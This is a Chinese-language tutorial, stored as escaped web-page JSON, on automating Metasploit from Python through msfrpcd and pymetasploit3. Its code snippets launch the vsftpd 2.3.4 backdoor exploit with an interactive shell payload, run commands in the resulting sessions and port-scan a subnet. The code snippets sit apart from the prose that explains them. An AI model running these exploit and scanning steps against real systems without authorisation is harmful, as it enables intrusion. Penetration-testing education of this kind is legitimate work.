![\"python\u5982\u4f55\u8c03\u7528msf\"](\"https:\/\/cdn-kb.worktile.com\/kb\/wp-content\/uploads\/2024\/04\/25083730\/1db3dbbc-6214-43ff-9a49-f5f94f5707c8.webp\")
<\/p>\n<\/p>\n
Python\u8c03\u7528Metasploit\uff08MSF\uff09\u7684\u65b9\u6cd5\u5305\u62ec\uff1a\u4f7f\u7528msfrpc\u3001\u901a\u8fc7\u547d\u4ee4\u884c\u63a5\u53e3\u3001\u5229\u7528pymetasploit3\u5e93\u3002<\/strong>\u5176\u4e2d\uff0c\u901a\u8fc7msfrpc\u8c03\u7528Metasploit\u662f\u6bd4\u8f83\u5e38\u89c1\u7684\u65b9\u6cd5<\/strong>\u3002msfrpc\uff08Metasploit Framework Remote Procedure Call\uff09\u662f\u4e00\u4e2a\u5141\u8bb8\u5916\u90e8\u7a0b\u5e8f\u901a\u8fc7\u7f51\u7edc\u63a5\u53e3\u4e0eMetasploit\u8fdb\u884c\u4ea4\u4e92\u7684\u5de5\u5177\uff0c\u53ef\u4ee5\u901a\u8fc7Python\u811a\u672c\u4f7f\u7528\u5b83\u6765\u81ea\u52a8\u5316\u548c\u8fdc\u7a0b\u63a7\u5236Metasploit\u7684\u64cd\u4f5c\u3002\u4ee5\u4e0b\u5c06\u8be6\u7ec6\u63cf\u8ff0\u5982\u4f55\u901a\u8fc7Python\u8c03\u7528Metasploit\u3002<\/p>\n<\/p>\n \u4e00\u3001MSFRPC\u7b80\u4ecb\u4e0e\u914d\u7f6e<\/p>\n<\/p>\n Metasploit Framework Remote Procedure Call\uff08msfrpc\uff09\u662fMetasploit\u7684\u4e00\u4e2a\u91cd\u8981\u7ec4\u4ef6\uff0c\u5b83\u5141\u8bb8\u7528\u6237\u901a\u8fc7\u7f16\u7a0b\u65b9\u5f0f\u4e0eMetasploit\u8fdb\u884c\u4ea4\u4e92\u3002msfrpc\u63d0\u4f9b\u4e86\u4e00\u79cdAPI\u63a5\u53e3\uff0c\u4f7f\u5f97\u6211\u4eec\u80fd\u591f\u4f7f\u7528Python\u7b49\u7f16\u7a0b\u8bed\u8a00\u4e0eMetasploit\u8fdb\u884c\u901a\u4fe1\u3002<\/p>\n<\/p>\n \u5b89\u88c5\u4e0e\u542f\u7528msfrpc\u670d\u52a1<\/strong><\/p>\n<\/p>\n \u9996\u5148\uff0c\u786e\u4fdd\u4f60\u7684\u7cfb\u7edf\u4e0a\u5df2\u7ecf\u5b89\u88c5\u4e86Metasploit Framework\u3002\u901a\u5e38\u60c5\u51b5\u4e0b\uff0cMetasploit\u4f1a\u81ea\u5e26msfrpc\u670d\u52a1\u3002\u8981\u542f\u7528msfrpc\u670d\u52a1\uff0c\u4f60\u9700\u8981\u4f7f\u7528 <\/code><\/pre>\n<\/p>\n \u8fd9\u91cc\uff0c \u914d\u7f6e\u6743\u9650\u4e0e\u8bbf\u95ee<\/strong><\/p>\n<\/p>\n \u4e3a\u4e86\u786e\u4fdd\u5b89\u5168\u6027\uff0cmsfrpcd\u901a\u5e38\u53ea\u5141\u8bb8\u672c\u5730\u8bbf\u95ee\u3002\u4f60\u53ef\u4ee5\u901a\u8fc7\u914d\u7f6e\u6587\u4ef6\u6765\u4fee\u6539\u5b83\u7684\u8bbf\u95ee\u6743\u9650\u3002\u4f8b\u5982\uff0c\u4f60\u53ef\u4ee5\u7f16\u8f91 \u4e8c\u3001\u4f7f\u7528PYTHON\u4e0eMSFRPC\u8fdb\u884c\u4ea4\u4e92<\/p>\n<\/p>\n \u5728\u914d\u7f6e\u597dmsfrpc\u670d\u52a1\u540e\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7Python\u6765\u8fdb\u884c\u4ea4\u4e92\u3002\u8fd9\u91cc\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528 \u5b89\u88c5pymetasploit3<\/strong><\/p>\n<\/p>\n \u4f60\u53ef\u4ee5\u901a\u8fc7pip\u5b89\u88c5\u8fd9\u4e2a\u5e93\uff1a<\/p>\n<\/p>\n <\/code><\/pre>\n<\/p>\n<\/li>\n \u8fde\u63a5Metasploit<\/strong><\/p>\n<\/p>\n \u4f7f\u7528pymetasploit3\u5e93\uff0c\u6211\u4eec\u53ef\u4ee5\u5f88\u5bb9\u6613\u5730\u8fde\u63a5\u5230Metasploit\u3002\u4e0b\u9762\u662f\u4e00\u4e2a\u7b80\u5355\u7684\u793a\u4f8b\u4ee3\u7801\uff0c\u5c55\u793a\u4e86\u5982\u4f55\u8fde\u63a5\u5230Metasploit\u5e76\u6267\u884c\u4e00\u4e9b\u57fa\u672c\u64cd\u4f5c\uff1a<\/p>\n<\/p>\n client = MsfRpcClient('msf', server='127.0.0.1', port=55553)<\/p>\n for module in client.modules.exploits:<\/p>\n print(module)<\/p>\n <\/code><\/pre>\n<\/p>\n \u5728\u4e0a\u9762\u7684\u4ee3\u7801\u4e2d\uff0c\u6211\u4eec\u521b\u5efa\u4e86\u4e00\u4e2aMsfRpcClient\u5bf9\u8c61\uff0c\u5e76\u4f7f\u7528\u7528\u6237\u540d\u548c\u5bc6\u7801\u8fdb\u884c\u8ba4\u8bc1\u3002\u7136\u540e\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u8fd9\u4e2a\u5bf9\u8c61\u8bbf\u95eeMetasploit\u4e2d\u7684\u5404\u79cd\u6a21\u5757\u548c\u529f\u80fd\u3002<\/p>\n<\/p>\n<\/li>\n<\/ol>\n \u4e09\u3001\u6267\u884cEXPLOIT\u4e0ePAYLOAD<\/p>\n<\/p>\n Metasploit\u7684\u5f3a\u5927\u4e4b\u5904\u5728\u4e8e\u5b83\u4e30\u5bcc\u7684\u653b\u51fb\u6a21\u5757\uff0c\u5305\u62ecexploits\u548cpayloads\u3002\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528Python\u811a\u672c\u6765\u81ea\u52a8\u5316\u8fd9\u4e9b\u64cd\u4f5c\u3002<\/p>\n<\/p>\n \u9009\u62e9\u548c\u914d\u7f6e\u6a21\u5757<\/strong><\/p>\n<\/p>\n \u8981\u6267\u884c\u4e00\u4e2aexploit\uff0c\u9996\u5148\u9700\u8981\u9009\u62e9\u4e00\u4e2a\u5408\u9002\u7684\u6a21\u5757\uff0c\u5e76\u8fdb\u884c\u76f8\u5e94\u7684\u914d\u7f6e\u3002\u4ee5\u4e0b\u662f\u4e00\u4e2a\u793a\u4f8b\u4ee3\u7801\uff0c\u5c55\u793a\u4e86\u5982\u4f55\u9009\u62e9\u4e00\u4e2a\u6a21\u5757\u5e76\u8fdb\u884c\u914d\u7f6e\uff1a<\/p>\n<\/p>\n payload = client.modules.use('payload', 'cmd\/unix\/interact')<\/p>\n exploit['RHOSTS'] = '192.168.1.10'<\/p>\n <\/code><\/pre>\n<\/p>\n<\/li>\n \u8fd0\u884cEXPLOIT<\/strong><\/p>\n<\/p>\n \u4e00\u65e6\u6a21\u5757\u914d\u7f6e\u5b8c\u6210\uff0c\u6211\u4eec\u53ef\u4ee5\u8fd0\u884c\u8fd9\u4e2aexploit\uff1a<\/p>\n<\/p>\n <\/code><\/pre>\n<\/p>\n \u6267\u884c\u540e\uff0cMetasploit\u4f1a\u5c1d\u8bd5\u5229\u7528\u6307\u5b9a\u7684\u6f0f\u6d1e\u3002<\/p>\n<\/p>\n<\/li>\n<\/ol>\n \u56db\u3001\u83b7\u53d6\u4e0e\u5904\u7406SESSIONS<\/p>\n<\/p>\n \u5728\u6210\u529f\u6267\u884cexploit\u540e\uff0cMetasploit\u901a\u5e38\u4f1a\u751f\u6210\u4e00\u4e2asession\u3002\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7Python\u811a\u672c\u6765\u83b7\u53d6\u548c\u5904\u7406\u8fd9\u4e9bsession\u3002<\/p>\n<\/p>\n \u83b7\u53d6\u5f53\u524d\u7684SESSIONS<\/strong><\/p>\n<\/p>\n \u4f60\u53ef\u4ee5\u901a\u8fc7\u4ee5\u4e0b\u4ee3\u7801\u83b7\u53d6\u5f53\u524d\u6240\u6709\u7684session\uff1a<\/p>\n<\/p>\n for session_id, session_info in sessions.items():<\/p>\n print(f"Session ID: {session_id}, Info: {session_info}")<\/p>\n <\/code><\/pre>\n<\/p>\n<\/li>\n \u4e0eSESSIONS\u8fdb\u884c\u4ea4\u4e92<\/strong><\/p>\n<\/p>\n \u4e00\u65e6\u83b7\u5f97session\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7Python\u4e0e\u5176\u8fdb\u884c\u4ea4\u4e92\uff0c\u4f8b\u5982\uff0c\u8fd0\u884c\u547d\u4ee4\uff1a<\/p>\n<\/p>\n response = session.run_with_output('whoami')<\/p>\n print(response)<\/p>\n <\/code><\/pre>\n<\/p>\n<\/li>\n<\/ol>\n \u4e94\u3001\u81ea\u52a8\u5316\u4e0e\u6269\u5c55<\/p>\n<\/p>\n \u4f7f\u7528Python\u8c03\u7528Metasploit\u7684\u4e00\u4e2a\u4e3b\u8981\u4f18\u70b9\u662f\u80fd\u591f\u5b9e\u73b0\u81ea\u52a8\u5316\u653b\u51fb\u4efb\u52a1\u3002\u6211\u4eec\u53ef\u4ee5\u7f16\u5199\u590d\u6742\u7684\u811a\u672c\u6765\u81ea\u52a8\u5316\u6574\u4e2a\u6e17\u900f\u6d4b\u8bd5\u6d41\u7a0b\uff0c\u5305\u62ec\u6f0f\u6d1e\u626b\u63cf\u3001\u5229\u7528\u3001\u4fe1\u606f\u6536\u96c6\u548c\u62a5\u544a\u751f\u6210\u3002<\/p>\n<\/p>\n \u81ea\u52a8\u5316\u626b\u63cf<\/strong><\/p>\n<\/p>\n \u53ef\u4ee5\u5229\u7528Metasploit\u4e2d\u7684\u626b\u63cf\u6a21\u5757\uff0c\u901a\u8fc7Python\u811a\u672c\u6279\u91cf\u626b\u63cf\u591a\u4e2a\u76ee\u6807\u3002\u4f8b\u5982\uff1a<\/p>\n<\/p>\n scanner['RHOSTS'] = '192.168.1.0\/24'<\/p>\n scanner['THREADS'] = 10<\/p>\n scanner.execute()<\/p>\n <\/code><\/pre>\n<\/p>\n<\/li>\n \u751f\u6210\u62a5\u544a<\/strong><\/p>\n<\/p>\n \u5728\u5b8c\u6210\u653b\u51fb\u4efb\u52a1\u540e\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7Python\u751f\u6210\u8be6\u7ec6\u7684\u62a5\u544a\uff0c\u4ee5\u4fbf\u4e8e\u5206\u6790\u548c\u5ba1\u8ba1\u3002\u4f8b\u5982\uff0c\u6536\u96c6\u6240\u6709session\u7684\u4fe1\u606f\uff0c\u6574\u7406\u6210\u4e00\u4e2a\u53ef\u8bfb\u7684\u62a5\u544a\u683c\u5f0f\u3002<\/p>\n<\/p>\n<\/li>\n<\/ol>\n \u901a\u8fc7\u4ee5\u4e0a\u65b9\u6cd5\uff0c\u6211\u4eec\u53ef\u4ee5\u9ad8\u6548\u5730\u5229\u7528Python\u8c03\u7528Metasploit\uff0c\u5b9e\u73b0\u81ea\u52a8\u5316\u7684\u6e17\u900f\u6d4b\u8bd5\u6d41\u7a0b\u3002\u968f\u7740\u6280\u672f\u7684\u4e0d\u65ad\u53d1\u5c55\u548c\u9700\u6c42\u7684\u53d8\u5316\uff0cPython\u4e0eMetasploit\u7684\u7ed3\u5408\u5c06\u4f1a\u8d8a\u6765\u8d8a\u5e7f\u6cdb\u548c\u6df1\u5165\u3002\u5e0c\u671b\u672c\u6587\u80fd\u591f\u4e3a\u4f60\u5728\u4fe1\u606f\u5b89\u5168\u9886\u57df\u7684\u5de5\u4f5c\u63d0\u4f9b\u4e00\u4e9b\u5e2e\u52a9\u548c\u542f\u793a\u3002<\/p>\n<\/p>\n Python\u53ef\u4ee5\u5982\u4f55\u4e0eMetasploit Framework\u96c6\u6210\uff1f<\/strong> \u5728Python\u4e2d\u4f7f\u7528Metasploit\u9700\u8981\u54ea\u4e9b\u4f9d\u8d56\u9879\uff1f<\/strong> \u5982\u4f55\u5728Python\u811a\u672c\u4e2d\u5904\u7406Metasploit\u7684\u8f93\u51fa\u7ed3\u679c\uff1f<\/strong>\n
msfrpcd<\/code>\u547d\u4ee4\u3002\u4f60\u53ef\u4ee5\u901a\u8fc7\u4ee5\u4e0b\u547d\u4ee4\u542f\u52a8msfrpc\u670d\u52a1\uff1a<\/p>\n<\/p>\nmsfrpcd -U msf -P msf -S<\/p>\n-U<\/code>\u548c-P<\/code>\u53c2\u6570\u5206\u522b\u6307\u5b9a\u4e86\u7528\u6237\u540d\u548c\u5bc6\u7801\uff0c-S<\/code>\u53c2\u6570\u8868\u793a\u4ee5\u670d\u52a1\u7684\u65b9\u5f0f\u542f\u52a8\u3002<\/p>\n<\/p>\n<\/li>\n\/opt\/metasploit-framework\/config\/database.yml<\/code>\u6587\u4ef6\u6765\u6307\u5b9a\u5141\u8bb8\u7684IP\u5730\u5740\u3002<\/p>\n<\/p>\n<\/li>\n<\/ol>\npymetasploit3<\/code>\u5e93\uff0c\u5b83\u662f\u4e00\u4e2a\u975e\u5b98\u65b9\u7684Python\u5e93\uff0c\u80fd\u591f\u65b9\u4fbf\u5730\u4e0eMetasploit\u8fdb\u884c\u4ea4\u4e92\u3002<\/p>\n<\/p>\n\n
pip install pymetasploit3<\/p>\nfrom pymetasploit3.msfrpc import MsfRpcClient<\/p>\n\u8fde\u63a5\u5230Metasploit<\/strong><\/h2>\n
\u83b7\u53d6\u5e76\u6253\u5370\u53ef\u7528\u7684\u6a21\u5757\u5217\u8868<\/strong><\/h2>\n
\n
exploit = client.modules.use('exploit', 'unix\/ftp\/vsftpd_234_backdoor')<\/p>\n\u8bbe\u7f6eRHOST\u53c2\u6570<\/strong><\/h2>\n
exploit.execute(payload=payload)<\/p>\n\n
sessions = client.sessions.list<\/p>\nsession = client.sessions.session('1')<\/p>\n\n
scanner = client.modules.use('auxiliary', 'scanner\/portscan\/tcp')<\/p>\n\u76f8\u5173\u95ee\u7b54FAQs\uff1a<\/strong><\/h2>\n
Python\u53ef\u4ee5\u901a\u8fc7\u4f7f\u7528Metasploit\u7684RPC\u63a5\u53e3\u6216\u901a\u8fc7\u8c03\u7528Metasploit\u7684\u547d\u4ee4\u884c\u5de5\u5177\u6765\u5b9e\u73b0\u96c6\u6210\u3002\u4f60\u53ef\u4ee5\u4f7f\u7528msfrpc<\/code>\u5e93\u6765\u5efa\u7acb\u4e0eMetasploit\u7684\u8fde\u63a5\uff0c\u4ece\u800c\u5b9e\u73b0\u5bf9\u6f0f\u6d1e\u5229\u7528\u7684\u81ea\u52a8\u5316\u3002\u901a\u8fc7\u8fd9\u4e9b\u65b9\u6cd5\uff0cPython\u53ef\u4ee5\u53d1\u9001\u547d\u4ee4\u3001\u83b7\u53d6\u7ed3\u679c\u5e76\u5904\u7406\u6f0f\u6d1e\u5229\u7528\u7684\u76f8\u5173\u6570\u636e\u3002<\/p>\n
\u8981\u5728Python\u4e2d\u4f7f\u7528Metasploit\uff0c\u901a\u5e38\u9700\u8981\u5b89\u88c5msfrpc<\/code>\u548crequests<\/code>\u5e93\u3002\u901a\u8fc7\u8fd9\u4e9b\u5e93\uff0c\u4f60\u53ef\u4ee5\u8fdb\u884cAPI\u8c03\u7528\u548c\u4e0eMetasploit\u8fdb\u884c\u4ea4\u4e92\u3002\u6b64\u5916\uff0c\u4f60\u8fd8\u9700\u8981\u786e\u4fddMetasploit Framework\u5df2\u6b63\u786e\u5b89\u88c5\u5e76\u6b63\u5728\u8fd0\u884c\uff0c\u4ee5\u4fbfPython\u811a\u672c\u80fd\u591f\u6210\u529f\u8fde\u63a5\u3002<\/p>\n
\u5728Python\u811a\u672c\u4e2d\u5904\u7406Metasploit\u7684\u8f93\u51fa\u7ed3\u679c\u53ef\u4ee5\u901a\u8fc7\u89e3\u6790JSON\u683c\u5f0f\u7684\u6570\u636e\u6765\u5b9e\u73b0\u3002\u5f53\u4f60\u4f7f\u7528RPC\u63a5\u53e3\u6267\u884c\u547d\u4ee4\u65f6\uff0cMetasploit\u4f1a\u8fd4\u56deJSON\u683c\u5f0f\u7684\u54cd\u5e94\u3002\u4f60\u53ef\u4ee5\u4f7f\u7528Python\u7684json<\/code>\u5e93\u89e3\u6790\u8fd9\u4e9b\u7ed3\u679c\uff0c\u5e76\u6839\u636e\u9700\u8981\u63d0\u53d6\u91cd\u8981\u4fe1\u606f\uff0c\u5982\u6f0f\u6d1e\u5229\u7528\u72b6\u6001\u3001\u76ee\u6807\u4e3b\u673a\u4fe1\u606f\u7b49\u3002\u8fd9\u79cd\u65b9\u5f0f\u53ef\u4ee5\u8ba9\u4f60\u66f4\u597d\u5730\u7ba1\u7406\u548c\u5206\u6790\u6f0f\u6d1e\u5229\u7528\u8fc7\u7a0b\u4e2d\u7684\u6570\u636e\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"Python\u8c03\u7528Metasploit\uff08MSF\uff09\u7684\u65b9\u6cd5\u5305\u62ec\uff1a\u4f7f\u7528msfrpc\u3001\u901a\u8fc7\u547d\u4ee4\u884c\u63a5\u53e3\u3001\u5229\u7528pymetas […]","protected":false},"author":3,"featured_media":948312,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[37],"tags":[],"acf":[],"_links":{"self":[{"href":"https:\/\/docs.pingcode.com\/wp-json\/wp\/v2\/posts\/948306"}],"collection":[{"href":"https:\/\/docs.pingcode.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/docs.pingcode.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/docs.pingcode.com\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/docs.pingcode.com\/wp-json\/wp\/v2\/comments?post=948306"}],"version-history":[{"count":"1","href":"https:\/\/docs.pingcode.com\/wp-json\/wp\/v2\/posts\/948306\/revisions"}],"predecessor-version":[{"id":948314,"href":"https:\/\/docs.pingcode.com\/wp-json\/wp\/v2\/posts\/948306\/revisions\/948314"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/docs.pingcode.com\/wp-json\/wp\/v2\/media\/948312"}],"wp:attachment":[{"href":"https:\/\/docs.pingcode.com\/wp-json\/wp\/v2\/media?parent=948306"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/docs.pingcode.com\/wp-json\/wp\/v2\/categories?post=948306"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/docs.pingcode.com\/wp-json\/wp\/v2\/tags?post=948306"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}